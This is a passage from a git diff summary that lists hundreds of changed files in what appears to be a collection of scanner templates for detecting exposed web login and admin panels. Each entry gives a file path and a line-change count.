.../fortinet/fortinet-fortinac-panel.yaml | 4 +- .../fortinet/fortinet-panel.yaml | 3 +- .../fortinet/fortios-management-panel.yaml | 5 +- .../fortinet/fortios-panel.yaml | 4 +- .../fortinet/fortitester-login-panel.yaml | 5 +- .../fortinet/fortiweb-panel.yaml | 4 +- http/exposed-panels/freeipa-panel.yaml | 5 +- .../freepbx-administration-panel.yaml | 4 +- .../froxlor-management-panel.yaml | 5 +- http/exposed-panels/ftm-manager-panel.yaml | 4 +- http/exposed-panels/fuelcms-panel.yaml | 4 +- .../fuji-xerox-printer-detect.yaml | 4 +- http/exposed-panels/gargoyle-router.yaml | 4 +- http/exposed-panels/genweb-plus-panel.yaml | 4 +- .../exposed-panels/geoserver-login-panel.yaml | 5 +- http/exposed-panels/gerapy-detect.yaml | 4 +- http/exposed-panels/gespage-panel.yaml | 2 +- .../gira-homeserver-homepage.yaml | 4 +- .../git-repository-browser.yaml | 5 +- http/exposed-panels/gitblit-panel.yaml | 5 +- http/exposed-panels/gitea-login.yaml | 3 +- .../github-enterprise-detect.yaml | 4 +- http/exposed-panels/gitlab-detect.yaml | 3 +- http/exposed-panels/globalprotect-panel.yaml | 4 +- http/exposed-panels/glowroot-panel.yaml | 4 +- http/exposed-panels/glpi-panel.yaml | 5 +- http/exposed-panels/gnu-mailman.yaml | 7 +- http/exposed-panels/go-anywhere-client.yaml | 4 +- http/exposed-panels/goanywhere-mft-login.yaml | 5 +- http/exposed-panels/gocd-login.yaml | 3 +- http/exposed-panels/gocron-panel.yaml | 3 +- http/exposed-panels/gogs-panel.yaml | 4 +- http/exposed-panels/gophish-login.yaml | 3 +- .../gradle/gradle-cache-node-detect.yaml | 4 +- .../gradle/gradle-enterprise-panel.yaml | 5 +- http/exposed-panels/grafana-detect.yaml | 4 +- .../grails-database-admin-console.yaml | 8 +- http/exposed-panels/graphite-browser.yaml | 2 +- http/exposed-panels/greenbone-panel.yaml | 4 +- http/exposed-panels/group-ib-panel.yaml | 4 +- http/exposed-panels/gryphon-login.yaml | 2 +- http/exposed-panels/gyra-master-admin.yaml | 4 +- http/exposed-panels/h2console-panel.yaml | 3 +- http/exposed-panels/hadoop-exposure.yaml | 5 +- http/exposed-panels/hangfire-dashboard.yaml | 5 +- http/exposed-panels/harbor-panel.yaml | 4 +- .../hashicorp-consul-agent.yaml | 4 +- .../hashicorp-consul-webgui.yaml | 3 +- http/exposed-panels/hestia-panel.yaml | 4 +- http/exposed-panels/highmail-admin-panel.yaml | 6 +- http/exposed-panels/hitron-technologies.yaml | 4 +- .../hivemanager-login-panel.yaml | 4 +- http/exposed-panels/hmc-hybris-panel.yaml | 6 +- http/exposed-panels/home-assistant-panel.yaml | 4 +- http/exposed-panels/homematic-panel.yaml | 3 +- .../honeywell-web-controller.yaml | 4 +- .../honeywell-xl-web-controller.yaml | 4 +- http/exposed-panels/horde-login-panel.yaml | 6 +- http/exposed-panels/horde-webmail-login.yaml | 6 +- .../hospital-management-panel.yaml | 4 +- http/exposed-panels/hp-ilo-5.yaml | 4 +- http/exposed-panels/hp-service-manager.yaml | 3 +- .../hp-virtual-connect-manager.yaml | 2 +- .../hpe-system-management-login.yaml | 4 +- http/exposed-panels/httpbin-panel.yaml | 2 +- http/exposed-panels/huawei-hg532e-panel.yaml | 3 +- .../hybris-administration-console.yaml | 6 +- http/exposed-panels/hydra-dashboard.yaml | 4 +- http/exposed-panels/hypertest-dashboard.yaml | 4 +- http/exposed-panels/i-mscp-panel.yaml | 4 +- http/exposed-panels/ibm-openadmin-panel.yaml | 2 +- .../ibm/ibm-advanced-system-management.yaml | 2 +- http/exposed-panels/ibm/ibm-maximo-login.yaml | 5 +- .../ibm/ibm-mqseries-web-console.yaml | 5 +- http/exposed-panels/ibm/ibm-note-login.yaml | 5 +- .../ibm/ibm-security-access-manager.yaml | 4 +- .../ibm/ibm-service-assistant.yaml | 2 +- .../ibm/ibm-websphere-admin-panel.yaml | 5 +- .../ibm/ibm-websphere-panel.yaml | 4 +- http/exposed-panels/icc-pro-login.yaml | 4 +- http/exposed-panels/icewarp-panel-detect.yaml | 5 +- http/exposed-panels/icinga-web-login.yaml | 3 +- http/exposed-panels/iclock-admin-panel.yaml | 3 +- .../ictprotege-login-panel.yaml | 10 +- .../identity-services-engine.yaml | 2 +- http/exposed-panels/ilch-admin-panel.yaml | 4 +- http/exposed-panels/ilias-panel.yaml | 5 +- .../incapptic-connect-panel.yaml | 3 +- http/exposed-panels/influxdb-panel.yaml | 2 +- http/exposed-panels/intelbras-login.yaml | 2 +- http/exposed-panels/intelbras-panel.yaml | 4 +- .../exposed-panels/intellian-aptus-panel.yaml | 5 +- .../intelliflash-login-panel.yaml | 4 +- .../interactsoftware-interact.yaml | 3 +- .../exposed-panels/iomega-emc-shared-nas.yaml | 4 +- .../ipdiva-mediation-panel.yaml | 5 +- http/exposed-panels/iptime-router.yaml | 4 +- http/exposed-panels/isams-panel.yaml | 3 +- http/exposed-panels/issabel-login.yaml | 2 +- http/exposed-panels/istat-panel-detect.yaml | 4 +- http/exposed-panels/itop-panel.yaml | 4 +- .../ixbus/ixbusweb-version.yaml | 2 +- http/exposed-panels/ixcache-panel.yaml | 3 +- http/exposed-panels/jamf-login.yaml | 5 +- http/exposed-panels/jamf-panel.yaml | 3 +- http/exposed-panels/jamf-setup-assistant.yaml | 4 +- http/exposed-panels/jaspersoft-panel.yaml | 3 +- .../jboss/jboss-jbpm-admin.yaml | 4 +- http/exposed-panels/jboss/jboss-juddi.yaml | 11 +- .../jboss/jboss-soa-platform.yaml | 4 +- http/exposed-panels/jboss/jmx-console.yaml | 5 +- http/exposed-panels/jboss/wildfly-panel.yaml | 4 +- http/exposed-panels/jcms-panel.yaml | 5 +- http/exposed-panels/jedox-web-panel.yaml | 3 +- http/exposed-panels/jeedom-panel.yaml | 2 +- .../jellyseerr-login-panel.yaml | 3 +- http/exposed-panels/jenkins-api-panel.yaml | 4 +- http/exposed-panels/jenkins-login.yaml | 6 +- http/exposed-panels/jfrog-login.yaml | 5 +- http/exposed-panels/joget/joget-panel.yaml | 2 +- http/exposed-panels/joomla-panel.yaml | 3 +- http/exposed-panels/jorani-panel.yaml | 3 +- http/exposed-panels/jsherp-boot-panel.yaml | 2 +- http/exposed-panels/jumpserver-panel.yaml | 16 +- http/exposed-panels/jupyter-notebook.yaml | 3 +- http/exposed-panels/kafka-center-login.yaml | 2 +- http/exposed-panels/kafka-connect-ui.yaml | 4 +- .../kafka-consumer-monitor.yaml | 2 +- http/exposed-panels/kafka-monitoring.yaml | 4 +- http/exposed-panels/kafka-topics-ui.yaml | 4 +- http/exposed-panels/kanboard-login.yaml | 5 +- http/exposed-panels/kasm-login-panel.yaml | 4 +- http/exposed-panels/kavita-panel-detect.yaml | 4 +- http/exposed-panels/keenetic-web-login.yaml | 5 +- http/exposed-panels/kenesto-login.yaml | 10 +- http/exposed-panels/kentico-login.yaml | 5 +- http/exposed-panels/kerio-connect-client.yaml | 2 +- http/exposed-panels/kettle-panel.yaml | 4 +- http/exposed-panels/keycloak-admin-panel.yaml | 5 +- .../exposed-panels/kfm/kaes-file-manager.yaml | 5 +- http/exposed-panels/kfm/kfm-login-panel.yaml | 5 +- http/exposed-panels/kibana-panel.yaml | 3 +- http/exposed-panels/kiwitcms-login.yaml | 2 +- http/exposed-panels/kkfileview-panel.yaml | 4 +- http/exposed-panels/klr300n-panel.yaml | 2 +- http/exposed-panels/kodak-network-panel.yaml | 2 +- http/exposed-panels/konga-panel.yaml | 4 +- .../kraken-cluster-monitoring.yaml | 4 +- .../kronos-workforce-central.yaml | 4 +- http/exposed-panels/kubernetes-dashboard.yaml | 5 +- .../kubernetes-enterprise-manager.yaml | 2 +- http/exposed-panels/kubernetes-mirantis.yaml | 4 +- http/exposed-panels/kubernetes-web-view.yaml | 4 +- http/exposed-panels/kubeview-dashboard.yaml | 4 +- http/exposed-panels/labkey-server-login.yaml | 5 +- http/exposed-panels/labtech-panel.yaml | 5 +- http/exposed-panels/lacie-panel.yaml | 4 +- http/exposed-panels/lancom-router-panel.yaml | 4 +- http/exposed-panels/landrayoa-panel.yaml | 4 +- http/exposed-panels/lansweeper-login.yaml | 4 +- .../lantronix-webmanager-panel.yaml | 5 +- http/exposed-panels/laravel-filemanager.yaml | 4 +- .../ldap-account-manager-panel.yaml | 4 +- http/exposed-panels/lenovo-fp-panel.yaml | 5 +- .../lenovo-thinkserver-panel.yaml | 4 +- http/exposed-panels/leostream-panel.yaml | 2 +- http/exposed-panels/librenms-login.yaml | 2 +- http/exposed-panels/liferay-portal.yaml | 4 +- http/exposed-panels/linkerd-panel.yaml | 4 +- http/exposed-panels/linksys-wifi-login.yaml | 2 +- .../livehelperchat-admin-panel.yaml | 4 +- .../exposed-panels/livezilla-login-panel.yaml | 4 +- .../locklizard-webviewer-panel.yaml | 4 +- .../logitech-harmony-portal.yaml | 4 +- http/exposed-panels/looker-panel.yaml | 4 +- http/exposed-panels/loxone-panel.yaml | 4 +- http/exposed-panels/lucee-login.yaml | 2 +- http/exposed-panels/luci-login-detection.yaml | 4 +- http/exposed-panels/mach-proweb-login.yaml | 4 +- http/exposed-panels/machform-admin-panel.yaml | 11 +- http/exposed-panels/maestro-login-panel.yaml | 5 +- http/exposed-panels/mag-dashboard-panel.yaml | 5 +- http/exposed-panels/magento-admin-panel.yaml | 6 +- .../magento-downloader-panel.yaml | 5 +- http/exposed-panels/magnolia-panel.yaml | 5 +- http/exposed-panels/mailhog-panel.yaml | 4 +- http/exposed-panels/mailwatch-login.yaml | 5 +- http/exposed-panels/maltrail-panel.yaml | 2 +- http/exposed-panels/mantisbt-panel.yaml | 4 +- http/exposed-panels/matomo-login-portal.yaml | 4 +- http/exposed-panels/mautic-crm-panel.yaml | 4 +- http/exposed-panels/meshcentral-login.yaml | 2 +- http/exposed-panels/metabase-panel.yaml | 2 +- http/exposed-panels/metasploit-panel.yaml | 6 +- .../exposed-panels/metasploit-setup-page.yaml | 4 +- http/exposed-panels/metersphere-login.yaml | 6 +- http/exposed-panels/mfiles-web-detect.yaml | 5 +- .../microfocus-admin-server.yaml | 4 +- .../exposed-panels/microfocus-filr-panel.yaml | 4 +- .../exposed-panels/microfocus-vibe-panel.yaml | 5 +- .../microsoft-exchange-panel.yaml | 4 +- .../mikrotik/mikrotik-routeros-old.yaml | 4 +- .../mikrotik/mikrotik-routeros.yaml | 4 +- http/exposed-panels/mini-start-page.yaml | 6 +- http/exposed-panels/minio-browser.yaml | 2 +- http/exposed-panels/minio-console.yaml | 7 +- http/exposed-panels/misp-panel.yaml | 2 +- http/exposed-panels/mitel-panel-detect.yaml | 5 +- .../mobile-management-panel.yaml | 4 +- http/exposed-panels/mobileiron-login.yaml | 7 +- http/exposed-panels/mobileiron-sentry.yaml | 2 +- http/exposed-panels/modoboa-panel.yaml | 5 +- http/exposed-panels/mongodb-ops-manager.yaml | 3 +- http/exposed-panels/monitorix-exposure.yaml | 5 +- http/exposed-panels/monstra-admin-panel.yaml | 4 +- http/exposed-panels/movable-type-login.yaml | 3 +- http/exposed-panels/mpftvc-admin-panel.yaml | 4 +- http/exposed-panels/mpsec-isg1000-panel.yaml | 2 +- http/exposed-panels/ms-adcs-detect.yaml | 4 +- http/exposed-panels/mspcontrol-login.yaml | 2 +- http/exposed-panels/mybb-forum-detect.yaml | 4 +- .../mybb/mybb-forum-install.yaml | 2 +- http/exposed-panels/mylittleadmin-panel.yaml | 4 +- http/exposed-panels/mylittlebackup-panel.yaml | 5 +- http/exposed-panels/mystrom-panel.yaml | 6 +- http/exposed-panels/nagios-panel.yaml | 5 +- http/exposed-panels/nagios-xi-panel.yaml | 5 +- http/exposed-panels/nagvis-panel.yaml | 5 +- http/exposed-panels/navicat-server-panel.yaml | 5 +- http/exposed-panels/ncentral-panel.yaml | 4 +- http/exposed-panels/nconf-panel.yaml | 4 +- http/exposed-panels/neo4j-browser.yaml | 2 +- http/exposed-panels/neobox-panel.yaml | 4 +- http/exposed-panels/neos-panel.yaml | 5 +- http/exposed-panels/nessus-panel.yaml | 4 +- .../netdata-dashboard-detected.yaml | 2 +- http/exposed-panels/netdata-panel.yaml | 2 +- http/exposed-panels/netflix-conductor-ui.yaml | 3 +- .../netgear-version-detect.yaml | 4 +- http/exposed-panels/netis-router.yaml | 4 +- http/exposed-panels/netlify-cms.yaml | 5 +- .../netris-dashboard-panel.yaml | 4 +- http/exposed-panels/netscaler-aaa-login.yaml | 5 +- http/exposed-panels/netscaler-gateway.yaml | 5 +- http/exposed-panels/netsparker-panel.yaml | 4 +- http/exposed-panels/netsus-server-login.yaml | 2 +- http/exposed-panels/nginx-admin-panel.yaml | 4 +- http/exposed-panels/nginx-proxy-manager.yaml | 6 +- http/exposed-panels/nginx-ui-dashboard.yaml | 4 +- http/exposed-panels/noescape-login.yaml | 4 +- .../nordex-wind-farm-portal.yaml | 5 +- .../normhost-backup-server-manager.yaml | 4 +- http/exposed-panels/novnc-login-panel.yaml | 6 +- http/exposed-panels/nozomi-panel.yaml | 4 +- http/exposed-panels/np-data-cache.yaml | 4 +- http/exposed-panels/nport-web-console.yaml | 4 +- http/exposed-panels/nsq-admin-panel.yaml | 2 +- .../nutanix-web-console-login.yaml | 5 +- http/exposed-panels/nuxeo-platform-panel.yaml | 5 +- http/exposed-panels/nzbget-panel.yaml | 4 +- http/exposed-panels/o2-easy-panel.yaml | 4 +- http/exposed-panels/ocomon-panel.yaml | 12 +- http/exposed-panels/ocs-inventory-login.yaml | 5 +- http/exposed-panels/octoprint-login.yaml | 6 +- .../exposed-panels/odoo-database-manager.yaml | 4 +- http/exposed-panels/odoo-panel.yaml | 2 +- .../officekeeper-admin-login.yaml | 4 +- http/exposed-panels/oipm-detect.yaml | 5 +- http/exposed-panels/oki-data.yaml | 5 +- http/exposed-panels/okiko-sfiler-portal.yaml | 2 +- http/exposed-panels/okta-panel.yaml | 3 +- http/exposed-panels/olt-web-interface.yaml | 4 +- http/exposed-panels/omniampx-panel.yaml | 4 +- http/exposed-panels/open-game-panel.yaml | 2 +- .../open-stack-dashboard-login.yaml | 6 +- .../open-virtualization-manager-panel.yaml | 2 +- http/exposed-panels/openam-panel.yaml | 3 +- http/exposed-panels/openbmcs-detect.yaml | 5 +- http/exposed-panels/openbullet2-panel.yaml | 5 +- http/exposed-panels/opencart-panel.yaml | 4 +- http/exposed-panels/opencast-detect.yaml | 2 +- http/exposed-panels/opencats-panel.yaml | 5 +- http/exposed-panels/opencpu-panel.yaml | 4 +- http/exposed-panels/openemr-detect.yaml | 4 +- http/exposed-panels/openerp-database.yaml | 4 +- http/exposed-panels/openfire-admin-panel.yaml | 5 +- http/exposed-panels/opengear-panel.yaml | 4 +- http/exposed-panels/opennebula-panel.yaml | 4 +- http/exposed-panels/opennms-web-console.yaml | 4 +- http/exposed-panels/opensis-panel.yaml | 3 +- http/exposed-panels/openvpn-admin.yaml | 5 +- http/exposed-panels/openvpn-connect.yaml | 4 +- http/exposed-panels/openvpn-monitor.yaml | 4 +- .../openvpn-router-management.yaml | 4 +- http/exposed-panels/openvz-web-login.yaml | 4 +- http/exposed-panels/openwrt-login.yaml | 2 +- http/exposed-panels/openx-panel.yaml | 9 +- .../oracle-business-control.yaml | 2 +- .../oracle-business-intelligence.yaml | 4 +- .../oracle-containers-panel.yaml | 4 +- .../oracle-enterprise-manager-login.yaml | 4 +- .../oracle-integrated-manager.yaml | 2 +- http/exposed-panels/oracle-opera-login.yaml | 3 +- .../oracle-people-enterprise.yaml | 2 +- .../exposed-panels/oracle-people-sign-in.yaml | 3 +- http/exposed-panels/orchid-vms-panel.yaml | 2 +- http/exposed-panels/osticket-panel.yaml | 5 +- .../osticket/osticket-install.yaml | 3 +- http/exposed-panels/otobo-panel.yaml | 2 +- http/exposed-panels/ourmgmt3-panel.yaml | 5 +- .../pacs-connexion-utilisateur.yaml | 2 +- .../pagespeed-global-admin.yaml | 12 +- http/exposed-panels/panabit-panel.yaml | 9 +- http/exposed-panels/pandora-fms-console.yaml | 6 +- http/exposed-panels/papercut-ng-panel.yaml | 3 +- .../exposed-panels/parallels-html-client.yaml | 5 +- .../parallels/parallels-hsphere-detect.yaml | 5 +- http/exposed-panels/parse-dashboard.yaml | 4 +- .../payroll-management-system-panel.yaml | 5 +- http/exposed-panels/pdi-device-page.yaml | 4 +- http/exposed-panels/pega-web-panel.yaml | 5 +- http/exposed-panels/pentaho-panel.yaml | 2 +- http/exposed-panels/persis-panel.yaml | 5 +- http/exposed-panels/pfsense-login.yaml | 2 +- http/exposed-panels/pgadmin-exposure.yaml | 5 +- http/exposed-panels/phabricator-login.yaml | 3 +- http/exposed-panels/phoronix-pane.yaml | 4 +- http/exposed-panels/php-mailer.yaml | 4 +- http/exposed-panels/phpcollab-panel.yaml | 2 +- http/exposed-panels/phpldapadmin-panel.yaml | 3 +- http/exposed-panels/phpminiadmin-panel.yaml | 4 +- http/exposed-panels/phpmyadmin-panel.yaml | 2 +- http/exposed-panels/phppgadmin-panel.yaml | 4 +- http/exposed-panels/pichome-panel.yaml | 5 +- http/exposed-panels/piwigo-panel.yaml | 7 +- http/exposed-panels/planet-estream-panel.yaml | 5 +- http/exposed-panels/plastic-scm-login.yaml | 3 +- http/exposed-panels/plesk-obsidian-login.yaml | 4 +- http/exposed-panels/plesk-onyx-login.yaml | 4 +- http/exposed-panels/polycom-admin-detect.yaml | 4 +- http/exposed-panels/polycom-login.yaml | 4 +- http/exposed-panels/portainer-panel.yaml | 3 +- http/exposed-panels/posthog-admin-panel.yaml | 4 +- .../powercom-network-manager.yaml | 4 +- http/exposed-panels/powerjob-panel.yaml | 4 +- http/exposed-panels/powerlogic-ion.yaml | 5 +- http/exposed-panels/pritunl-panel.yaml | 2 +- http/exposed-panels/privx-panel.yaml | 2 +- http/exposed-panels/processwire-login.yaml | 4 +- .../exposed-panels/project-insight-login.yaml | 2 +- http/exposed-panels/projectsend-login.yaml | 2 +- .../prometheus-exposed-panel.yaml | 4 +- .../prometheus-pushgateway-exposed-panel.yaml | 4 +- http/exposed-panels/proxmox-panel.yaml | 4 +- http/exposed-panels/pulsar-admin-console.yaml | 4 +- http/exposed-panels/pulsar-adminui-panel.yaml | 4 +- .../exposed-panels/pulsar360-admin-panel.yaml | 4 +- http/exposed-panels/pulse-secure-panel.yaml | 5 +- http/exposed-panels/pulse-secure-version.yaml | 5 +- http/exposed-panels/puppetboard-panel.yaml | 5 +- http/exposed-panels/pure-storage-login.yaml | 2 +- http/exposed-panels/pyload-panel.yaml | 3 +- http/exposed-panels/pypicloud-panel.yaml | 2 +- http/exposed-panels/qBittorrent-panel.yaml | 3 +- http/exposed-panels/qdpm-login-panel.yaml | 3 +- http/exposed-panels/qlik-sense-server.yaml | 4 +- http/exposed-panels/qmail-admin-login.yaml | 6 +- .../qnap/qnap-photostation-panel.yaml | 5 +- http/exposed-panels/qnap/qnap-qts-panel.yaml | 5 +- http/exposed-panels/qualcomm-voip-router.yaml | 2 +- http/exposed-panels/qualtrics-login.yaml | 4 +- .../exposed-panels/quantum-scalar-detect.yaml | 4 +- http/exposed-panels/r-webserver-login.yaml | 4 +- http/exposed-panels/rabbitmq-dashboard.yaml | 5 +- http/exposed-panels/racksnet-login.yaml | 2 +- http/exposed-panels/radius-manager.yaml | 5 +- http/exposed-panels/rancher-dashboard.yaml | 3 +- http/exposed-panels/rancher-panel.yaml | 4 +- http/exposed-panels/raspberrymatic-panel.yaml | 3 +- http/exposed-panels/red-lion-panel.yaml | 2 +- http/exposed-panels/redash-panel.yaml | 2 +- .../redhat/redhat-satellite-panel.yaml | 5 +- .../redis-commander-exposure.yaml | 10 +- .../redis-enterprise-panel.yaml | 2 +- http/exposed-panels/remedy-axis-login.yaml | 4 +- http/exposed-panels/remkon-manager-panel.yaml | 2 +- http/exposed-panels/remote-ui-login.yaml | 5 +- .../exposed-panels/repetier-server-panel.yaml | 2 +- .../residential-gateway-login.yaml | 3 +- http/exposed-panels/retool-login.yaml | 4 +- http/exposed-panels/riseup-panel.yaml | 4 +- .../rocketmq-console-exposure.yaml | 4 +- http/exposed-panels/room-alert-detect.yaml | 5 +- http/exposed-panels/roxy-fileman.yaml | 7 +- .../royalevent-management-panel.yaml | 5 +- http/exposed-panels/rsa-self-service.yaml | 6 +- http/exposed-panels/rstudio-detect.yaml | 6 +- .../ruckus-unleashed-panel.yaml | 2 +- .../ruckus-wireless-admin-login.yaml | 5 +- http/exposed-panels/ruijie/rg-uac-panel.yaml | 2 +- http/exposed-panels/rundeck-login.yaml | 5 +- .../rustici-content-controller.yaml | 5 +- http/exposed-panels/saferoads-vms-login.yaml | 5 +- http/exposed-panels/sage-panel.yaml | 2 +- http/exposed-panels/saltgui-panel.yaml | 5 +- .../saltstack-config-panel.yaml | 4 +- http/exposed-panels/samba-swat-panel.yaml | 4 +- .../samsung-printer-detect.yaml | 2 +- http/exposed-panels/sap-cloud-analytics.yaml | 5 +- .../sap-hana-xsengine-panel.yaml | 5 +- http/exposed-panels/sap-netweaver-portal.yaml | 5 +- .../sap-successfactors-detect.yaml | 5 +- http/exposed-panels/sapfiori-panel.yaml | 4 +- http/exposed-panels/sas-login-panel.yaml | 5 +- http/exposed-panels/satis-repository.yaml | 6 +- http/exposed-panels/sauter-login.yaml | 4 +- .../sauter-moduwebvision-panel.yaml | 3 +- .../scriptcase/scriptcase-panel.yaml | 3 +- .../scriptcase/scriptcase-prod-login.yaml | 3 +- http/exposed-panels/scs-landfill-control.yaml | 6 +- http/exposed-panels/seafile-panel.yaml | 5 +- http/exposed-panels/seagate-nas-login.yaml | 2 +- http/exposed-panels/seats-login.yaml | 5 +- http/exposed-panels/secmail-detect.yaml | 2 +- http/exposed-panels/secnet-ac-panel.yaml | 4 +- http/exposed-panels/secure-login-panel.yaml | 2 +- http/exposed-panels/securenvoy-panel.yaml | 4 +- http/exposed-panels/securepoint-utm.yaml | 2 +- http/exposed-panels/securityspy-detect.yaml | 2 +- http/exposed-panels/seeddms-panel.yaml | 3 +- http/exposed-panels/selenium-grid.yaml | 2 +- http/exposed-panels/selenoid-ui-exposure.yaml | 5 +- http/exposed-panels/selfcheck-panel.yaml | 4 +- http/exposed-panels/sensu-panel.yaml | 4 +- http/exposed-panels/sentinelone-console.yaml | 4 +- http/exposed-panels/sequoiadb-login.yaml | 2 +- http/exposed-panels/server-backup-login.yaml | 5 +- .../server-backup-manager-se.yaml | 2 +- .../servicedesk-login-panel.yaml | 2 +- .../sevone-nms-network-manager.yaml | 3 +- http/exposed-panels/sgp-login-panel.yaml | 2 +- http/exposed-panels/shardingsphere-panel.yaml | 4 +- http/exposed-panels/sharecenter-login.yaml | 5 +- http/exposed-panels/sharefile-panel.yaml | 2 +- http/exposed-panels/shell-box.yaml | 3 +- http/exposed-panels/shoutcast-server.yaml | 2 +- http/exposed-panels/sicom-panel.yaml | 5 +- http/exposed-panels/sidekiq-dashboard.yaml | 1 + .../signet-explorer-dashboard.yaml | 4 +- http/exposed-panels/sitecore-login.yaml | 2 +- http/exposed-panels/sitefinity-login.yaml | 3 +- http/exposed-panels/siteomat-login.yaml | 5 +- http/exposed-panels/skycaiji-admin-panel.yaml | 5 +- http/exposed-panels/slocum-login.yaml | 4 +- http/exposed-panels/smartping-dashboard.yaml | 5 +- http/exposed-panels/snapcomms-panel.yaml | 2 +- .../solarview-compact-panel.yaml | 5 +- http/exposed-panels/solarwinds-orion.yaml | 4 +- .../solarwinds-servuftp-detect.yaml | 6 +- http/exposed-panels/solr-panel-exposure.yaml | 5 +- http/exposed-panels/somansa-dlp-detect.yaml | 5 +- http/exposed-panels/somfy-login.yaml | 4 +- http/exposed-panels/sonarqube-login.yaml | 4 +- .../sonic-wall-application.yaml | 4 +- http/exposed-panels/sonic-wall-login.yaml | 3 +- .../sonicwall-analyzer-login.yaml | 4 +- .../sonicwall-management-panel.yaml | 5 +- .../sonicwall-sslvpn-panel.yaml | 4 +- .../sophos-fw-version-detect.yaml | 6 +- http/exposed-panels/sophos-mobile-panel.yaml | 2 +- http/exposed-panels/sophos-web-appliance.yaml | 2 +- .../exposed-panels/spacelogic-cbus-panel.yaml | 2 +- http/exposed-panels/spark-panel.yaml | 4 +- http/exposed-panels/sphider-login.yaml | 6 +- http/exposed-panels/sphinxonline-panel.yaml | 2 +- http/exposed-panels/spiderfoot.yaml | 4 +- .../splunk-enterprise-panel.yaml | 3 +- http/exposed-panels/splunk-login.yaml | 2 +- http/exposed-panels/spotweb-login-panel.yaml | 4 +- http/exposed-panels/sql-monitor.yaml | 9 +- http/exposed-panels/sqlbuddy-panel.yaml | 4 +- http/exposed-panels/squirrelmail-login.yaml | 4 +- .../exposed-panels/sqwebmail-login-panel.yaml | 6 +- http/exposed-panels/star-network-utility.yaml | 4 +- .../start-element-manager-panel.yaml | 4 +- http/exposed-panels/steve-login-panel.yaml | 5 +- http/exposed-panels/storybook-panel.yaml | 5 +- http/exposed-panels/strapi-documentation.yaml | 6 +- http/exposed-panels/strapi-panel.yaml | 5 +- http/exposed-panels/stridercd-panel.yaml | 2 +- http/exposed-panels/submitty-login.yaml | 10 +- http/exposed-panels/subrion-login.yaml | 5 +- http/exposed-panels/sugarcrm-panel.yaml | 3 +- http/exposed-panels/sunbird-dcim-panel.yaml | 3 +- .../sungrow-logger1000-detect.yaml | 4 +- http/exposed-panels/superadmin-ui-panel.yaml | 4 +- http/exposed-panels/supermicro-bmc-panel.yaml | 2 +- http/exposed-panels/superset-login.yaml | 5 +- http/exposed-panels/supervpn-panel.yaml | 5 +- .../symantec/symantec-dlp-login.yaml | 2 +- .../symantec/symantec-epm-login.yaml | 2 +- .../symantec/symantec-ewep-login.yaml | 2 +- .../symantec/symantec-iam-console.yaml | 2 +- .../symantec-pgp-global-directory.yaml | 2 +- .../symantec/symantec-phishing-panel.yaml | 4 +- .../synapse-mobility-panel.yaml | 2 +- http/exposed-panels/syncserver-panel.yaml | 2 +- http/exposed-panels/syncthru-web-service.yaml | 4 +- http/exposed-panels/synnefo-admin-panel.yaml | 4 +- .../synology-rackstation-login.yaml | 3 +- .../synopsys-coverity-panel.yaml | 3 +- http/exposed-panels/sysaid-panel.yaml | 6 +- http/exposed-panels/tableau-panel.yaml | 2 +- .../tableau-service-manager.yaml | 4 +- http/exposed-panels/teamcity-login-panel.yaml | 5 +- http/exposed-panels/teampass-panel.yaml | 5 +- .../exposed-panels/tectuus-scada-monitor.yaml | 4 +- http/exposed-panels/tekton-dashboard.yaml | 4 +- http/exposed-panels/telerik-server-login.yaml | 6 +- .../telesquare/tlr-2005ksh-login.yaml | 4 +- http/exposed-panels/teltonika-login.yaml | 2 +- http/exposed-panels/tembosocial-panel.yaml | 5 +- http/exposed-panels/temenos-t24-login.yaml | 4 +- .../tenda-11n-wireless-router-login.yaml | 8 +- http/exposed-panels/tenda-web-master.yaml | 4 +- http/exposed-panels/teradek-panel.yaml | 4 +- http/exposed-panels/teradici-pcoip-panel.yaml | 4 +- .../terraform-enterprise-panel.yaml | 2 +- http/exposed-panels/terramaster-login.yaml | 4 +- .../thinfinity-virtualui-panel.yaml | 2 +- http/exposed-panels/threatq-login.yaml | 4 +- http/exposed-panels/thruk-login.yaml | 3 +- http/exposed-panels/tigase-xmpp-server.yaml | 4 +- http/exposed-panels/tikiwiki-cms.yaml | 5 +- http/exposed-panels/tiny-file-manager.yaml | 5 +- http/exposed-panels/tooljet-panel.yaml | 5 +- .../total-web-solutions-panel.yaml | 4 +- http/exposed-panels/totemomail-panel.yaml | 5 +- http/exposed-panels/tracer-sc-login.yaml | 4 +- http/exposed-panels/traefik-dashboard.yaml | 11 +- .../trendnet/trendnet-tew827dru-login.yaml | 2 +- .../tufin-securetrack-login.yaml | 3 +- http/exposed-panels/tup-openframe.yaml | 4 +- http/exposed-panels/turnkey-openvpn.yaml | 4 +- .../tuxedo-connected-controller.yaml | 6 +- http/exposed-panels/typo3-login.yaml | 4 +- http/exposed-panels/umbraco-login.yaml | 5 +- .../unauth-xproxy-dashboard.yaml | 2 +- http/exposed-panels/unauthenticated-frp.yaml | 5 +- http/exposed-panels/unifi-panel.yaml | 3 +- http/exposed-panels/untangle-admin-login.yaml | 3 +- http/exposed-panels/uptime-kuma-panel.yaml | 2 +- http/exposed-panels/user-control-panel.yaml | 2 +- http/exposed-panels/v2924-admin-panel.yaml | 4 +- http/exposed-panels/vault-panel.yaml | 5 +- .../veeam-backup-azure-panel.yaml | 2 +- http/exposed-panels/veeam-backup-gcp.yaml | 4 +- http/exposed-panels/veeam-panel.yaml | 4 +- http/exposed-panels/veriz0wn-osint.yaml | 2 +- http/exposed-panels/verizon-router-panel.yaml | 4 +- .../versa/versa-director-login.yaml | 4 +- .../versa/versa-flexvnf-panel.yaml | 4 +- http/exposed-panels/versa/versa-sdwan.yaml | 4 +- http/exposed-panels/vertex-tax-panel.yaml | 4 +- http/exposed-panels/vidyo-login.yaml | 2 +- http/exposed-panels/vigor-login.yaml | 5 +- .../exposed-panels/virtua-software-panel.yaml | 5 +- http/exposed-panels/virtual-ema-detect.yaml | 4 +- .../vmware-carbon-black-edr.yaml | 4 +- .../vmware-cloud-availability.yaml | 4 +- .../exposed-panels/vmware-cloud-director.yaml | 4 +- http/exposed-panels/vmware-ftp-server.yaml | 4 +- http/exposed-panels/vmware-hcx-login.yaml | 4 +- http/exposed-panels/vmware-horizon-daas.yaml | 2 +- http/exposed-panels/vmware-horizon-panel.yaml | 4 +- http/exposed-panels/vmware-nsx-login.yaml | 4 +- .../vmware-vcenter-converter-standalone.yaml | 4 +- .../vmware-vcloud-director.yaml | 4 +- http/exposed-panels/vodafone-voxui-panel.yaml | 4 +- http/exposed-panels/voipmonitor-panel.yaml | 2 +- .../vrealize-loginsight-panel.yaml | 